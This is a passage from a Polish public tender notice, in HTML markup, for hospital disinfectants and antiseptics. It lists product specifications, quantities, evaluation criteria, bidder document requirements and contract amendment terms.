miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Opis preparatu	spektrum działania	Wielkość opakowania	Ilość	Cena netto	Wartość netto	Stawka VAT	Wartość brutto	Nazwa handlowa, nazwa producenta, nr katalogowy producenta<br/>1.	Preparat bezaldehydowy,oparty o aktywny tlen ,zawierający nadwęglan sodu. Przeznaczony do mycia i dezynfekcji powierzchni zmywalnych.Możliwość stosowania do powierzchni mających kontakt z żywnością.Działajacy na bakterie prątki grużlicy, grzyby ,wirusy, sporyCl.Difficile i Cl. perfringens w czasach nie prezkraczających 15 min.	B,F,V, Tbc ,S- 15 min	160 g	140 <br/>2.	Preparat do dezynfekcji zmywalnych powierzchni w basenach, saunach, przebieralniach, szatniach w zakładach fizykoterapii ,zawierający wyłącznie związki amonioweczwartorzędowe jako substancję aktywną mogące mieć w roztworze użytkowym kontakt ze skórą,mogący być stosowany do higienicznego mycia rąk i skóry .	B, F,MRSA,HBV,HCV,HIV,Papova	6 l	3 <br/>Razem </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje skorzystanie z prawa opcji zgodnie z postanowieniami projektu umowy w tym zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Opis preparatu	spektrum działania	Wielkość opakowania	Ilość	Cena netto	Wartość netto	Stawka VAT	Wartość brutto	Nazwa handlowa, nazwa producenta, nr katalogowy producenta<br/>1.	Preparat chlorowy oparty o aktywny chlor, zawierający dichloroizocyjanuran sodu z tenzydem myjącym przeznaczony do dezynfekcji dużych powierzchni zmywalnych ,również zanieczyszczonych substancją organiczną, 1 tabl zawiera 1000ppm.	B,Tbc,F,S,V/Polio, Adeno, HCV,HIV,HBV,clostridium difficille- (warunki brudne całe specktrum)	200 tabl	650 <br/>Razem <br/><br/>Dopuszcza się przeliczenie opakowań </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje skorzystanie z prawa opcji zgodnie z postanowieniami projektu umowy w tym zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Opis preparatu	spektrum działania	Wielkość opakowania	Ilość	Cena netto	Wartość netto	Stawka VAT	Wartość brutto	Nazwa handlowa, nazwa producenta, nr katalogowy producenta<br/>1.	Preparat do higienicznego mycia rąk wg EN1499 , a także mycia pacjentów bakteriobójczy, ( łącznie z MRSA), drożdżobójczy zawierający diglukonian chlorheksydyny i chlorek didecylodimetyloamonu	B/MRSA, F, V/HBV, HCV, HIV	500 ml	280 <br/>2.	Preparat alkoholowy do higienicznego i chirurgicznego odkażania rąk,w postaci płynu na bazie alkoholu -89G etanol.Zawierający w swoim składzie substancje nawilżające i natłuszczające skórę takie jak :witamina E,gliceryna aloes,panthenol.Preparat nie może zawierać substancji fenolowych ,jodu oraz jego zwiazków. kompatybilny z dozownikami dermados	B,F,V/HBV,HCV,HIV,Rota,Noro, Adeno,polio /,Tbc	500 ml	5500 <br/>3.	Preparat tenzydowy o pH 5,0 do higienicznego i chirurgicznego mycia rąk zawierający substancje zapobiegające wysuszeniu skóry, APG.Bez zawartości mydła 500 ml	8000 <br/>4.	Emulsja typu olej w wodzie do codziennej pielęgnacji rąk przy myciu i dezynfekcji , zawierająca wosk pszczeli . 500 ml	300 <br/>5.	Preparat do odkażania i odtłuszczania skóry, na bazie trzech alkoholi i nadtlenku wodoru ,bez pochodnych fenolowych ,nie zawiera jodu, autosterylny, bezbarwny	B,MRSA,F,V/ HBV,HIV,Hermes,Adeno,Rota/ ,Tbc	350 ml	900 <br/>6.	Preparat do odkażania i odtłuszczania skóry, na bazie trzech alkoholi i nadtlenku wodoru ,bez pochodnych fenolowych ,nie zawiera jodu, autosterylny, bezbarwny.Na 12butelek spryskiwacz.	B,MRSA,F,V/ HBV,HIV,Hermes,Adeno,Rota/ ,Tbc	1 l	900 <br/>7.	Preparat barwiony do odkażania skóry przed iniekcjami ,pobraniem krwi, operacjami ,punkcjami;szeroki zakres działania na bakterie łącznie z Tbc i MRSA, grzyby,wirusy /HIV, HBV, Herpes, Rota, Adeno / odtłuszcza skórę, bez zawartości jodu na bazie alkoholi i nadtlenku wodoru nie zawierający pochodnych fenolowych,	B,MRSA,F,V/ HIV,HBV,Herpes,Rota ,Adeno / ,Tbc	350 ml	150 <br/>8.	Preparat barwiony do odkażania skóry przed iniekcjami ,pobraniem krwi, operacjami ,punkcjami;szeroki zakres działania na bakterie łącznie z Tbc i MRSA, grzyby,wirusy /HIV, HBV, Herpes, Rota, Adeno / odtłuszcza skórę, bez zawartości jodu na bazie alkoholi i nadtlenku wodoru nie zawierający pochodnych fenolowych,	B,MRSA,F,V/ HIV,HBV,Herpes,Rota ,Adeno / ,Tbc	1 l	500 <br/>9.	Bezjodowy preparat do odkażania śluzówek jamy ustnej zawierający chlorheksydynę i alkohol etylowy , autosterylny – PH 4,5- 5,0	B,F,V	300ml	400 <br/>10.	Bezjodowy preparat do odkażania obszaru genitalnego(okolice cewki moczowej), na bazie chlorheksydyny o przedłużonym działaniu, autosterylny	B,F,V / HIV,HBV,Hermes/, pierwotniaki	500 ml	250 <br/>11.	Preparat do dezynfekcji zewnętrznych elementów centralnych i obwodowych cewników dożylnych ,wejść do kanału wkłucia ,korki, kraniki, zawierający 2% digluconian chlorhexydyny w 70% alkoholu izopropylowym ,działający na bakterie (łącznie z Tbc),drożdże,rotawirusy i wirusy osłonione (łącznie z HBV,HCV,HIV)	B(łącznie z Tbc),drożdże,rotawirusy i wirusy osłonione (łącznie z HBV,HCV,HIV)	250ml	120 <br/>12.	Płynny koncentrat do mycia i dezynfekcji powierzchni i wyposażenia pomieszczeń. Preparat na bazie IV-rzędowych zw. amoniowych, diaminy i alkoholu, nie zawiera aktywnego chloru, tlenu, pochodnych fenolowych, aldehydów. Możliwość stosowania w obecności pacjentów, na oddziałach pediatrycznych i noworodkowych. Do pojemnika pomka.	B, V, F (HIV,HCV,HBV,Rota) stężeniu 0,25% do 15 minut. Możliwość poszerzenia o Adeno	5 l.	30 <br/>13.	pompka do pojeminka z poz 10 10 <br/>14.	Płynny koncentrat do mycia i dezynfekcji powierzchni i wyposażenia pomieszczeń. Preparat na bazie IV-rzędowych zw. amoniowych, diaminy i alkoholu, nie zawiera aktywnego chloru, tlenu, pochodnych fenolowych, aldehydów. Możliwość stosowania w obecności pacjentów, na oddziałach pediatrycznych i noworodkowych	B, V, F (HIV,HCV,HBV,Rota) stężeniu 0,25% do 15 minut. Możliwość poszerzenia o Adeno	1 l.	10 <br/>15.	Preparat w postaci szybkodziałającej gotowej pianki do dezynfekcji i mycia powierzchni medycznych. Preparat na bazie H2O2, bez zawartości alkoholu, chloru, QAV ,kwasu nadoctowego oraz poliaminy.	Zgodnie z EN 16615 (test czterech pól) B, F(drożdżaki) -15 sekund , V zgodnie z RKI V (HBV, HCV, HIV, Adeno, Polyoma SV40, ), Rota – 30s. Możliwość rozszerzenia spektrum o wirusy Noro i zgodnie z EN 14476 do 15 minut	750 ml	160 <br/>Razem <br/><br/><br/> Dostarczenie na czas umowy w ramach pakietu lampy UV wraz ze środkiem optycznie czynnym (min. 6 op. x 300 ml wraz z pompką) przeznaczonej do szkoleń personelu szpitalnego z zakresu higieny rąk. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje skorzystanie z prawa opcji zgodnie z postanowieniami projektu umowy w tym zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Opis preparatu	spektrum działania	Wielkość opakowania	Ilość	Cena netto	Wartość netto	Stawka VAT	Wartość brutto	Nazwa handlowa, nazwa producenta, nr katalogowy producenta<br/>1.	Preparat sporobójczy do dezynfekcji endoskopów gietkich, sprzetu termolabilnego na bazie kwasu nadoctowego,wytwarzanego ex trempore z acetylokaprolaktamu(system Fera)zawierający 3 % nadtlenku wodoru.Maksymalny czas trwałości przygotowanego roztworu 14 dni(z mozliwości kontroli aktywnego roztworuza pamocą pasków kontrolnych- testowych)	B, F, Tbc, V, S(Bacillus substilis,Clostridium sporogenes,Clostridium difficiles )– do 5 minut	5 litr	10,00 <br/>2.	Paski testowe do poz 1 50 szt.	5,00 <br/>3.	Preparat do mycia i dezynfekcji narzędzi medycznych i chirurgicznych na bazie niejonowych środków powierzchniowo-czynnych,czwartorzędowych związków amonowych i chlorhexydyny.Zawierający substancje zapachowe(np cytrynowy). Bez zawartości enzymów. Może być stosowany w myjkach ultradźwiękowych .	B, Y, V (HIV , HCV, Vaccinia, Herpes)-0,5% w czasie 15 min., Tbc	5L z pomką	50,00 <br/>Razem </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje skorzystanie z prawa opcji zgodnie z postanowieniami projektu umowy w tym zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Opis preparatu	spektrum działania	Wielkość opakowania	Ilość	Cena netto	Wartość netto	Stawka VAT	Wartość brutto	Nazwa handlowa, nazwa producenta, nr katalogowy producenta<br/>1.	Preparat do dezynfekcji higienicznej i chirurgicznej rąk w postaci żelu na bazie etanolu. Zawierający w swoim składzie substancje nawilżające i natłuszczajace skórę takich jak gliceryna, aloes, panthenol. Prerat nie zawiera substancji fenolowych jodu oraz jego związków.dopasowany do dozowników typu dermados- wyłącznie	B,V,F,Tbc ( HBV,HCV,HIV,Rota, Noro, Adeno,Polio)	500ml	70,00 <br/>2.	Preparat do dezynfekcji endoskopów o działaniu sporobójczym na bazie 2% aldehydu glutarowego, z możliwością stosowania 30 dni oraz kontrolą zawartości substancji czynnej za pomocą pasków testowych.Preparat typu Steranios 2% -wyłącznie	B, Tbc, F, V (HIV, HCV, HBV, Herpes, Adeno, Polio) - 10 minut.Czas działania dla spektrum poszerzonego o S (spory) - 60 minut	5L z pomką	65,00 <br/>3.	Paski testowe do poz 2 100 szt w op	40,00 <br/>Razem </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje skorzystanie z prawa opcji zgodnie z postanowieniami projektu umowy w tym zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Opis preparatu	spektrum działania	Wielkość opakowania	Ilość	Cena netto	Wartość netto	Stawka VAT	Wartość brutto	Nazwa handlowa, nazwa producenta, nr katalogowy producenta<br/>1.	Preparat w postaci szybko działajacych gotowych do uzycia chusteczek do dezynfekcji i mycia powierzchni medycznych.prerparat na bazie H2O2 bez zawartości alkoholu , chloru QAC i amin.Chusteczka o wymiarze 20 cm x 20 cm i gramaturze 50g / 1m2.	Zgodne z normą EN-16615(test 4 pól) B,Tbc,F,Cl.difficile- 5 min,V zgodnie z RKI V( HBV,HCV,HIV,Adeno,Polyoma,SV40- 1min.,Virusobójczy zgodnie z EN 14476 łącznie z Norovirusem	100 chust.	1 200 <br/>Razem </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje skorzystanie z prawa opcji zgodnie z postanowieniami projektu umowy w tym zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 10.1	Dokumenty wraz z ofertą!!!!!!!!!!!!!!!!!!!! :<br/>10.1.1	Wypełniony i podpisany we wskazanych miejscach Załącznik nr 1 – formularz opis przedmiotu zamówienia – zestawienie wymaganych i oferowanych parametrów,<br/>10.1.2	Wypełniony we wskazanych miejscach i podpisany Załącznik nr 2 –formularz ofertowy,<br/>10.1.3	Dokumenty rejestrowe potwierdzające posiadanie uprawnień/pełnomocnictwa potwierdzające umocowanie osób do składania oferty w imieniu Wykonawcy,<br/>10.1.4	Oświadczenie o braku podstaw wykluczenia z postępowania stanowiące wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu z postępowania według wzoru stanowiącego Załącznik nr 3 do SWZ (wypełnić pkt 3!!!! ewentualnie oświadczenie z pkt 4 dotyczące wykazanie rzetelności w sytuacji podleganiu wykluczeniu, ewentualnie oświadczenie z pkt 5, czyli oświadczenie Wykonawcy dotyczące podmiotu na które zasoby lub sytuację na które się wykonawca powołuje w zakresie braku podstaw do wykluczenia tego podmiotu),<br/>10.1.5	Potwierdzenie wniesienia wadium, o ile jest to wymagane. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 13.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>14.	W przypadku składania ofert przez podmioty ubiegające się wspólnie o udzielenie zamówienia należy dołączyć pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>15.	Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający będzie mógł żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców<br/>16.	W przypadku, gdy Wykonawca w miejsce któregoś z dokumentów, o których mowa w SWZ dostarczy jego kopię, kopia ta musi być poświadczona za zgodność z oryginałem przez Wykonawcę. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów udostępniających Wykonawcy zasoby, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów powinny być poświadczane za zgodność z oryginałem przez Wykonawcę lub te podmioty. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów (np. jeśli przedstawione kserokopie będą nieczytelne lub będą wzbudzać wątpliwości co do ich prawdziwości).<br/>17.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2.	Kupujący przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie, której dokonano wyboru oferty Sprzedającego na wniosek którejkolwiek ze stron, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Kupującego lub też dotyczą: <br/>1)	zmiany świadczenia Sprzedającego na świadczenie lepszej jakości przy zachowaniu tożsamości towaru,<br/>2)	wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych od Sprzedającego,<br/>3)	zmiany danych Sprzedającego ( np. zmiana siedziby, adresu, nazwy),<br/>4)	działania siły wyższej lub wystąpienia stanu wyższej konieczności<br/>5)	zmian organizacyjnych Kupującego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe<br/>6)	zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Kupującego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,<br/>7)	omyłek pisarskich lub błędów rachunkowych,<br/>8)	mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,<br/>9)	zmiany stawki podatku VAT na towar,<br/>10)	jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Kupującego,<br/>11)	innych zmian korzystnych dla Kupującego, w tym polegających na zamianie towarów na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.<br/>3. Strony ustalają, iż zmiana numeru katalogowego, nazwy przedmiotu zamówienia, liczby opakowań, wielkości opakowań niepowodującej zmiany przedmiotu zamówienia, nie stanowi zmiany umowy i nie wymaga aneksu. Sprzedający zobowiązany jest do niezwłocznego powiadomienia Kupującego o tym fakcie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-23 09:00</span></h3> <h3 